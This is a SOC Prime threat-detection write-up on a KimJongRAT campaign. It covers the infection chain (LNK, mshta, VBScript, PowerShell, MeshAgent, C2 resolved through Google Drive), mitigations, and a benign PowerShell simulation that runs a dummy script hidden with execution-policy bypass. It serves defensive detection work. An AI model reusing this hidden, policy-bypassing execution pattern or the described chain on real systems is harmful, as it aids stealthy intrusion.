SOC Prime Bias: Critical

30 Jun 2026 06:48 UTC

KimJongRAT Continues to Evolve Through Living Off Trusted Sites

Author Photo
SOC Prime Team linkedin icon Follow
KimJongRAT Continues to Evolve Through Living Off Trusted Sites
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A recent KimJongRAT campaign has been observed using GitHub Releases and Google Drive as trusted platforms to host and deliver malware. This updated variant blends InfoStealer and RAT functionality while relying on Living Off Trusted Sites (LOTS) techniques to lower the chance of detection. It has also evolved to retrieve command-and-control addresses dynamically from Google Drive, reducing the need for repeated recompilation.

Investigation

The investigation reviewed a May 2026 campaign in which victims were redirected through shortened links to GitHub-hosted ZIP archives containing malicious LNK files. Researchers mapped the execution chain, including abuse of mshta.exe, VBScript, and PowerShell to launch multi-stage payloads. The analysis also uncovered a new capability involving deployment of MeshAgent for long-term remote access.

Mitigation

Organizations should enforce strict controls over execution of LNK files and mshta.exe when sourced from untrusted locations. Monitoring for suspicious PowerShell behavior, including Base64-encoded commands and downloads from cloud services such as Google Drive and GitHub, is essential. Restricting unauthorized remote management tools such as MeshAgent can further limit the impact of compromise.

Response

If this activity is detected, isolate affected hosts immediately to prevent lateral movement and data exfiltration. Conduct memory forensics to identify any active malicious DLLs or PowerShell components. Review Google Drive and GitHub access logs for unusual activity tied to the identified infrastructure, and update endpoint detections with the extracted indicators of compromise.

"flowchart TD step_initial_access["T1566.001 & T1566.002 u2013 Phishing: Spearphishing Attachment/Link: Lured via shortened URLs to download tax_edoc.zip from GitHub"] step_user_execution["T1204.002 u2013 User Execution: Malicious File: Victim opens a malicious LNK file from the extracted ZIP"] rules_for_user_execution("<b>Rule Name</b>: Execution from ZIP Archive [7zip] (via process_creation)<br/><b>Rule ID</b>: 43917da8-4e9a-4cd2-b3f9-dc60e2326534") step_proxy_execution["T1218.005 u2013 System Binary Proxy Execution: Mshta: Uses Mshta to download and execute pdfko.zip from GitHub"] step_script_execution["T1218.001 & T1216.002 u2013 System Binary/Script Proxy Execution: Obfuscated VBScript in HTA uses Compiled HTML File and SyncAppvPublishingServer"] step_decoy_steganography["T1027.003 u2013 Obfuscated Files or Information: Steganography: Downloads a decoy document to distract the user"] step_branching{"Environment Check: Determines if Windows Defender is active"} step_defender_inactive["T1027 & T1218.011 u2013 Obfuscated Files & Rundll32: Downloads encrypted user.txt/sys.log via AES/RC4 and executes sys.dll"] step_defender_active["T1027.006 u2013 Obfuscated Files or Information: HTML Smuggling: Executes PowerShell 1.ps1 to decode KimJongRAT"] step_persistence_c2["T1219 & T1568 & T1578 u2013 Persistence & C2: Installs MeshAgent and uses Dynamic Resolution via Google Drive to update C2 addresses"] step_initial_access –>|leads_to| step_user_execution step_user_execution –>|leads_to| step_proxy_execution step_user_execution -.->|detected_by| rules_for_user_execution step_proxy_execution –>|leads_to| step_script_execution step_script_execution –>|leads_to| step_decoy_steganography step_decoy_steganography –>|leads_to| step_branching step_branching –>|if_inactive| step_defender_inactive step_branching –>|if_active| step_defender_active step_defender_inactive –>|leads_to| step_persistence_c2 step_defender_active –>|leads_to| step_persistence_c2 "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary has successfully gained a foothold and is attempting to execute the KimJongRAT payload. To evade simple signature-based detection, the malware is designed to run a PowerShell script in a hidden window, bypassing the execution policy, and passing a specific log filename as a parameter to handle its encrypted configuration. The goal is to establish a persistent, stealthy remote access trojan (RAT) on the victim machine. We will execute the exact command pattern identified in the detection rule to validate the “selection_execute” logic.

  • Regression Test Script:

    # Simulation of KimJongRAT execution pattern
    # This creates a dummy script to satisfy the '-File' requirement
    "Write-Output 'Simulating KimJongRAT Payload'" | Out-File -FilePath "1.ps1" -Encoding ascii
    
    # Executing the command that triggers the detection rule
    # Note: This is run in a way that mimics the command line arguments exactly.
    Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log" -WindowStyle Hidden
  • Cleanup Commands:

    # Remove the dummy files created during simulation
    Remove-Item -Path "1.ps1" -ErrorAction SilentlyContinue
    Remove-Item -Path "1.log" -ErrorAction SilentlyContinue